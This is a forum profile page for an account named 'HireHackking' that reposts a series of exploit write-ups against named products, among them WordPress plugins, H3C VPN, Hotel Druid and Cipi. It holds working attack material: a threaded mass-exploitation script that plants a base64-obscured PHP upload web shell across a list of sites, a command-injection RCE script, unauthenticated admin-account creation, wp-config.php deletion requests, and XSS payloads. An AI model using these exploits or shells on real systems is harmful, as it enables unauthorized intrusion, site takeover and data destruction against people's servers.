Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    H3C SSL VPN - Username Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: H3C SSL VPN - Username Enumeration # Exploit Author: LiquidWorm H3C SSL VPN Username Enumeration Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd. Product web page: https://www.h3c.com Affected version: n/a Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a new generation of professional SSL VPN devices for enterprises. They can function as ingress gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized enterprises. Desc: The weakness is caused due to the login script and how it verifies provided credentials. An attacker can use this weakness to enumerate valid users on the affected application via 'txtUsrName' POST parameter. Tested on: ssl vpn gateway HttpServer 1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5697 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php 24.01.2022 -- Non-valid: ---------- POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode= <tr><td align="center">User is not exist</TD></TR> Valid: ------ POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode= <tr><td align="center">Input password incorrect</TD></TR> Valid: ------ POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode= <tr><td align="center">Local user state is inactive</TD></TR>
  2. HireHackking

    TeamSpeak 3.5.6 - Insecure File Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions # Date: 2022-02-15 # Exploit Author: Aryan Chehreghani # Contact: aryanchehreghani@yahoo.com # Vendor Homepage: https://www.teamspeak.com # Software Link: https://www.teamspeak.com/en/downloads # Version: 3.5.6 # Tested on: Windows 10 x64 # [ About - TeamSpeak ]: #TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP), #application for audio communication between users on a chat channel, #much like a telephone conference call, Users typically use headphones with a microphone, #The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels, #The target audience for TeamSpeak is gamers, who can use the software to communicate, #with other players on the same team of a multiplayer video game, #Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls. # [ Description ]: #The TeamSpeak Application was installed with insecure file permissions. #It was found that all folder and file permissions were incorrectly configured during installation. #It was possible to replace the service binary. # [ POC ]: C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe createfileassoc.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) error_report.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) package_inst.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) ts3client_win32.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) Uninstall.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) update.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) Successfully processed 7 files; Failed processing 0 files # [ Exploit - Privilege Escalation ]: #Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ... #with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
  3. HireHackking

    Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated) # Author: Luis Martinez # Discovery Date: 2022-02-13 # Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features # Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568 # Tested Version: NVR304-16EP # Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr # Vulnerability Type: Reflected Cross-Site Scripting (XSS) # CVE: N/A # Proof of Concept: http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>
  4. HireHackking

    Title: 5 Nmap online alternatives

    HireHackking posted a blog entry in Hacker Technology
    When we occasionally become interested in scanning an IP, or want to conceal scanning IP, have we ever thought of alternatives to nmap? Today, this article will recommend 5 excellent websites. For use! The disadvantage of using Nmap to scan online is that it is not possible to run Nmap scripts easily like using Nmap from the terminal. However, most current Nmap online scanning schemes usually perform scans on the most popular ports. 01 IPV6Scanner As the name implies, IPV6Scanner.com is a network scanner that allows any user to perform port scanning for any hostname, IPV4 or IPv6-based address. Its simple interface requires you to fill in the target and click Scan to perform a default scan on the most common server ports. 02 Nmap.online Nmap online It is probably the most classic alternative solution for Nmap-looking. Web-based applications, not applications running on the terminal. It provides a simple interface to scan any domain or IP address, and you can choose the type of scan you want to perform, such as fast scan, port scan, operating system detection, or tracking routing. After the scan is complete, you will get Nmap scan results that display the open, filtered, and closed ports in the same way as traditional Nmap, as shown below Scan results are as followsScan Type Description: Quick Scan This is probably the most commonly used option because it allows you to scan the first 100 most common ports Port Scans let you perform TCP scans on ports 21, 22, 25, 80, 110, 143, 443, and 445 and enable service detection, so you can get data about running services remotely OS detection allows you to detect operating systems running on remote hosts. 03 Shodan Shodan is a search engine focusing on indexing data from any connected device, such as computers, servers, mobile phones, desks, webcams, smart TVs, refrigerators, smart kitchens, medical devices, traffic lights, and other IoT devices. Scan results As shown above, it can accurately obtain the target open port and corresponding port information. In addition to port information, you also get detailed information about the IP, such as the country, organization, ISP, last update date, associated hostname, ASN, and running web technologies found on that IP, and more. 04 ZoomEye Developed by Chinese cybersecurity company Knowsec Inc. ZoomEye is an IoT search engine designed to become a search engine in cyberspace. Like Shodan, ZoomEye also provides data about port scans. Scan the following exposed port 22 as well as the operating system, tags and geolocation, and listen for the software version of the port, as well as friendly port statistics. Of course, ZoomEye also supports more advanced syntax, so let’s give a brief example below. Command description example space representation or operation logic service:'ssh' service:'http' search for data of ssh or http protocol + then the operation device:'router'+after:'2020-01-01' search for data of 2020-01-01-01-01-designated router data-represented non-operation country:'CN'-subdivisions:'beijing' search for data in China except Beijing country:'CN' search for country assets. You can use the national abbreviation, or you can use the full name of China/English name such as country:'China' country:'china'ip:'8.8.8'Search IP's C-segment asset cidr:52.2.254.36/16 is IP's B-segment asset cidr:52.2.254.36/8 is IP's A-segment asset port:80 is currently not supported to open multi-port targets at the same time. Other examples can be found on the official website. 05 SurfaceBrowser SurfaceBrowser™ is a complete Internet surface analyzer that gives you access to a complete data security platform that includes current and historical DNS records, complete IP blocks, SSL certificates, managed domains, associated domains, complete subdomains lists, user agent information for each IP, and of course open ports and running services.
  5. HireHackking

    WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated) # Date: 09-11-2021 # Exploit Author: Ceylan Bozogullarindan # Exploit Website: https://bozogullarindan.com # Vendor Homepage: https://bestwebsoft.com/ # Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/ # Version: 1.1.1 # Tested on: Linux # CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0) # Description: Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file! I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users. An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files. # Steps To Reproduce 1. Install and activate the plugin. 2. Click the "Log Monitor" available under Error Log Viewer menu item. 3. Choose a log file to clear. 4. Intercept the request via Burp or any other local proxy tool. 5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php. 6. Check the content of the cleared file. You will see that the file is empty. # PoC - Supported Materials --------------------------------------------------------------------------- POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1 Host: 127.0.0.1:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 603 Connection: close Upgrade-Insecure-Requests: 1 Cookie: [admin+] rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php ---------------------------------------------------------------------------
  6. HireHackking

    Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-13 # Vendor Homepage: https://www.emerson.com/en-us # Software Link : https://www.opertek.com/descargar-software/?prc=_326 # Tested Version: 9.80 Build 8695 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """ Trapi File Server TrapiServer C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe Auto # Service info: C:\>sc qc TrapiServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: TrapiServer TYPE : 120 WIN32_SHARE_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Trapi File Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  7. HireHackking

    WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation

    HireHackking posted a blog entry in Hacker Technology
    # Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation # Date: 16.02.2022 # Author: Numan Türle # CVE: CVE-2022-0441 # Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ # Version: <2.7.6 # https://www.youtube.com/watch?v=SI_O6CHXMZk # https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6 # https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1 Connection: close Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip, deflate Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 Content-Type: application/json Content-Length: 339 {"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
  8. HireHackking

    Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-17 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/drfone_full3360.exe # Tested Version: 11.4.9 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """ Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto # Service info: C:\>sc qc DFWSIDService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DFWSIDService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare WSID help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  9. HireHackking

    WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated) # Google Dork: inurl:wp-content/plugins/dzs-zoomsounds # Date: 16/02/2022 # Exploit Author: Overthinker1877 (1877 Team) # Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/ # Version: 6.60 # Tested on: Windows / Linux import os import requests import threading from multiprocessing.dummy import Pool,Lock from bs4 import BeautifulSoup import time import smtplib,sys,ctypes from random import choice from colorama import Fore from colorama import Style from colorama import init import re import time from time import sleep init(autoreset=True) fr = Fore.RED gr = Fore.BLUE fc = Fore.CYAN fw = Fore.WHITE fy = Fore.YELLOW fg = Fore.GREEN sd = Style.DIM sn = Style.NORMAL sb = Style.BRIGHT Bad = 0 Good = 0 def Folder(directory): if not os.path.exists(directory): os.makedirs(directory) Folder("exploited") def clear(): try: if os.name == 'nt': os.system('cls') else: os.system('clear') except: pass def finder(i) : global Bad,Good head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} try : x = requests.session() listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php'] for script in listaa : url = (i+"/"+script) while True : req_first = x.get(url, headers=head) if "error:http raw post data does not exist" in req_first.text : burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"} burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>" requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45) urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php") req_second = x.get(urlx, headers=head) if "Overthinker1877" in req_second.text : Good = Good + 1 print(fg+"Exploited "+fw+">> "+fg+" = "+urlx) with open("exploited/shell.txt","a") as file : file.write(urlx+"\n") file.close() else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit") else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln") pass break except : pass if os.name == 'nt': ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad)) else : sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad)) def key_logo(): clear = '\x1b[0m' colors = [36, 32, 34, 35, 31, 37] x = ' [ + ] OVERTHINKER1877 EXPLOIT' for N, line in enumerate(x.split('\n')): sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear)) time.sleep(0.05) def process(line): time.sleep(1) def run() : key_logo() clear() print(""" [-] -----------------------------------------[-] [+] WwW.1877.TeaM [-] -----------------------------------------[-] \n \n""") file_name = input("Website List : ") op = open(file_name,'r').read().splitlines() TEXTList = [list.strip() for list in op] p = Pool(int(input('Thread : '))) p.map(finder, TEXTList) run()
  10. HireHackking

    Hotel Druid 3.0.3 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE) # Date: 05/01/2022 # Exploit Author: 0z09e (https://twitter.com/0z09e) # Vendor Homepage: https://www.hoteldruid.com/ # Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz # Version: 3.0.3 # CVE : CVE-2022-22909 #!/usr/bin/python3 import requests import argparse def login( target , username = "" , password = "", noauth=False): login_data = { "vers_hinc" : "1", "nome_utente_phpr" : username, "password_phpr" : password } if not noauth: login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False ) if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text: token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0] anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0] ret_data = {"token" : token , "anno" : anno} #print("ret data" + ret_data) return ret_data else: return False else: login_req = requests.get(f"{target}/inizio.php" , verify=False ) try: anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0] token = "" ret_data = {"token" : token , "anno" : anno} return ret_data except: return False def check_privilege(target , anno , token=""): priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False) #print(priv_req.text) if "Modify" in priv_req.text: return True else: return False def add_room(target , anno , token=""): add_room_data = { "anno": anno, "id_sessione": token, "n_app":"{${system($_REQUEST['cmd'])}}", "crea_app":"SI", "crea_letti":"", "n_letti":"", "tipo_tabella":"appartamenti" } add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False) #print(add_req.text) if "has been added" in add_req.text: return True else: return False def test_code_execution(target): code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id") if "uid=" in code_execution_req.text: return code_execution_req.text.split("\n")[0] else: return False def main(): banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$ | $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ | $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$ | $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$ |__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n""" parser = argparse.ArgumentParser() req_args = parser.add_argument_group('required arguments') req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True) req_args.add_argument("-u" , "--username" , help="Username" , required=False) req_args.add_argument("-p" , "--password" , help="password", required=False) req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False) args = parser.parse_args() target = args.target if target[-1] == "/": target = target[:-1] noauth = args.noauth username = args.username password = args.password if noauth == False and (username == None or password == None): print('[-] Please provide the authentication method.' ) quit() print(banner) if not noauth: print(f"[*] Logging in with the credential {username}:{password}") login_result = login(username = username , password = password , target = target) if login_result != False: token = login_result.get('token') anno = login_result.get('anno') else: print("[-] Login failed, Check your credential or check if login is required or not .") quit() else: print('[*] Trying to access the Dashboard.') login_result = login(username = username , password = password , target = target , noauth=True) if login_result != False: token = login_result.get('token') anno = login_result.get('anno') else: print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.') exit() print("[*] Checking the privilege of the user.") if check_privilege(target= target , token=token , anno=anno): print("[+] User has the privilege to add room.") else: print("[-] User doesn't have the privilege to add room.") exit() print("[*] Adding a new room.") if add_room(target = target , anno=anno , token=token): print('[+] Room has been added successfully.') else: print('[-] Unknown error occured, unable to add room. Maybe the room has already been added') exit() print('[*] Testing code exection') output = test_code_execution(target = target) if output != False: print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.") print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id') print(f"[+] Example Output : {output}") exit() else: print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname") exit() main()
  11. HireHackking

    Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 24.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/> # Software Link: https://cipi.sh/ <https://www.aapanel.com/> # Version: 3.1.15 # Tested on: Ubuntu When the user wants to add a new server on the "Server" panel, in "name" parameter has not had any filtration. POST /api/servers HTTP/1.1 Host: IP Content-Length: 102 Accept: application/json X-Requested-With: XMLHttpRequest Authorization: Bearer User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Content-Type: application/json Origin: http://IP Referer: http://IP/servers Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close { "name":"\"><script>alert(1337)</script>", "ip":"10.10.10.10", "provider":"local", "location":"xss test" }
  12. HireHackking

    Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-17 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/mobiletrans_full5793.exe # Tested Version: 3.5.9 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """ Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto # Service info: C:\>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  13. HireHackking

    Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2022-02-16 # Vendor Homepage: https://www.cobiansoft.com/ # Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe # Tested Version: 0.9.93 RC1 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py # 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard # 3.- Open "Cobian Reflector User Interface" # 4.- Task -> "New task" # 5.- Files -> Source "Add" -> SFTP # 6.- Host -> 10.10.10.10 # 7.- Port-> 22 # 8.- User name -> admin # 9.- Paste ClipBoard on "Password" # 10.- Test settings # 11.- Yes # 12.- Crashed #!/usr/bin/env python buffer = "\x41" * 8000 f = open ("Cobian_Reflector_0.9.93_RC1.txt", "w") f.write(buffer) f.close()
  14. HireHackking

    Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2022-02-16 # Vendor Homepage: https://www.cobiansoft.com/ # Software Link: https://files.cobiansoft.com/programs/cbSetup.exe # Tested Version: 11.2.0.582 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code: Cobian_Backup_11.2.0.582.py # 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard # 3.- Open "Cobian Backup 11 Gravity User Interface" # 4.- Task -> "New task" # 5.- File -> Source "Add" -> FTP # 6.- Host -> 10.10.10.10 # 7.- Port-> 21 # 8.- User name -> admin # 9.- Paste ClipBoard on "Password" # 10.- Ok # 11.- Crashed #!/usr/bin/env python buffer = "\x41" * 800 f = open ("Cobian_Backup_11.2.0.582.txt", "w") f.write(buffer) f.close()
  15. HireHackking

    Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-24 # Vendor Homepage: https://www.cobiansoft.com/ # Software Link : https://files.cobiansoft.com/programs/cbSetup.exe # Tested Version: 11.2.0.582 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Gravity " | findstr /i /v """ Cobian Backup 11 Gravity CobianBackup11 C:\Program Files (x86)\Cobian Backup 11\cbService.exe Auto # Service info: C:\>sc qc CobianBackup11 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CobianBackup11 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Cobian Backup 11\cbService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cobian Backup 11 Gravity DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  16. HireHackking

    Casdoor 1.13.0 - SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
